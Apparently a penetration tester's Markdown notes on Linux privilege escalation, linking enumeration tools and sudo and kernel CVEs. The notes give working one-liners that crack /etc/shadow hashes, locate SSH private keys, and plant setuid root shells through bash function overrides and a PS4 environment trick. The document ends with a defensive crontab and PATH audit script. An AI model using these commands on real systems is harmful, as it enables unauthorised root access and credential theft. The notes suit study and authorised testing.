# Linux Privilege Escalation

## Links

* [Basics](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
* [LinEnum](https://github.com/rebootuser/LinEnum)
* [Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh)
* [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester)
* [GTFObins](https://gtfobins.github.io/)
* [Linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)

## Kernel Exploits

### Dirty COW

* [CVE-2016-5195](https://dirtycow.ninja/)
* [c0w.c](../kernel-exploits/dirtycow)

## Stored Keys & Passwords

* History
* Environment Variables
* Config + Dot Files
* SSH keys

```sh
# Group the -name tests so that -type f applies to both of them
find / -type f \( -name "authorized_keys" -o -name "id_rsa" \) 2>/dev/null
```

## Permissions

* Weak permissions
* Umask
* Unshadow via `unshadow /etc/passwd /etc/shadow > unshadow.txt` and john or hashcat.
  * e.g. `john --wordlist=./wordlist --format=crypt hash`
* SUID
  * list

    ```sh
    # List files with the SUID or SGID bit set
    find / -perm /6000 -ls 2>/dev/null
    ```

  * [Shared object injection](../../../exploit/linux/shared_object_injection.md)
  * [CVE-2016-1247](https://www.cvedetails.com/cve/CVE-2016-1247/)
* User specific files

```sh
find / -user root -name "*.txt"
```

## Sudo Binary

* [Baron Samedit](../../../exploit/linux/sudo/baron_samedit.md)
* [CVE-2019-14287](../../../exploit/linux/sudo/CVE_2019_14287.md)
* [CVE-2019-18634](../../../exploit/linux/sudo/CVE_2019_18634.md)
* [LD_PRELOAD](../../../exploit/linux/ld_preload.md)
* `sudo -l`
  * Take a look at GTFObins
  * Keep an eye on the displayed host and env capabilities

## PATH Hijacking

* Interpositioning binaries via PATH
* Look for binaries used in other bins and scripts
* Interpose a binary of the same name and put its directory at the front of `$PATH`

## Bash function

* Interpositioning of binaries via bash functions

```sh
function /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
```

```sh
export -f /path/to/binary
```

* Call the binary which invokes this function

## Environment Variable

```sh
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '; set +x; /tmp/bash -p'
```

## Capabilities

* [capabilities](../../../exploit/linux/capabilities.md)

## Crontab

* Check `cat /etc/crontab`
* Check writable scripts and binaries that are scheduled
* Check `$PATH` order

## NFS Rootsquash

* [nfs rootsquash](../../../exploit/linux/nfs_rootsquash.md)
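
Added example (not part of the original notes): a hardening audit for the Crontab and PATH Hijacking checks above. It reads a system-style crontab and reports group- or world-writable job targets and writable `PATH` directories that are searched before a job's command; the function names, the `/usr/bin:/bin` default and the sample files built by `demo` are assumptions constructed for the illustration.

```sh
# Added example: audit a system-style crontab (m h dom mon dow user command).
# True when the path (symlinks followed) is group- or world-writable.
is_loose() {
    [ -n "$(find -H "$1" -prune \( -perm -0020 -o -perm -0002 \) -print 2>/dev/null)" ]
}

# Report the first risky element met while resolving a job's command.
check_cmd() {   # $1 = command word, $2 = PATH in effect for the job
    case "$1" in
        /*) if is_loose "$1"; then printf 'WRITABLE_TARGET %s\n' "$1"; fi; return ;;
    esac
    old_ifs=$IFS; IFS=:; set -f
    for dir in $2; do
        # A writable directory searched before the real binary is found
        if is_loose "$dir"; then printf 'WRITABLE_PATH_DIR %s (before %s)\n' "$dir" "$1"; break; fi
        [ -x "$dir/$1" ] || continue
        if is_loose "$dir/$1"; then printf 'WRITABLE_TARGET %s\n' "$dir/$1"; fi
        break
    done
    IFS=$old_ifs; set +f
}

audit_crontab() {   # $1 = crontab file
    cron_file=$1
    cron_path=/usr/bin:/bin     # assumed default when the file sets no PATH
    while IFS= read -r line || [ -n "$line" ]; do
        set -f; set -- $line; set +f    # split into fields without globbing "*"
        case "${1:-}" in
            PATH=*)  cron_path=${1#PATH=} ;;
            @*)      [ $# -ge 3 ] && check_cmd "$3" "$cron_path" ;;
            [0-9*]*) [ $# -ge 7 ] && check_cmd "$7" "$cron_path" ;;
        esac
    done < "$cron_file"
    return 0
}

# Constructed sample: one loose script, one loose PATH directory, one clean job.
demo() {
    t=$(mktemp -d) || return 1
    mkdir "$t/safe" "$t/loose"; chmod 755 "$t/safe"; chmod 777 "$t/loose"
    printf '#!/bin/sh\n' > "$t/safe/backup.sh"; chmod 755 "$t/safe/backup.sh"
    printf '#!/bin/sh\n' > "$t/safe/clean.sh";  chmod 777 "$t/safe/clean.sh"
    cat > "$t/crontab" <<EOF
PATH=$t/loose:$t/safe
*/5 * * * * root $t/safe/clean.sh
@daily root backup.sh --full
0 3 * * * root $t/safe/backup.sh
EOF
    audit_crontab "$t/crontab"; rm -rf "$t"
}
```

Source the file and run `audit_crontab /etc/crontab` on a host, or `demo` to see the two findings on the constructed sample. Each finding is fixed by removing group and world write permission from the reported file or directory, or by using absolute paths in the job.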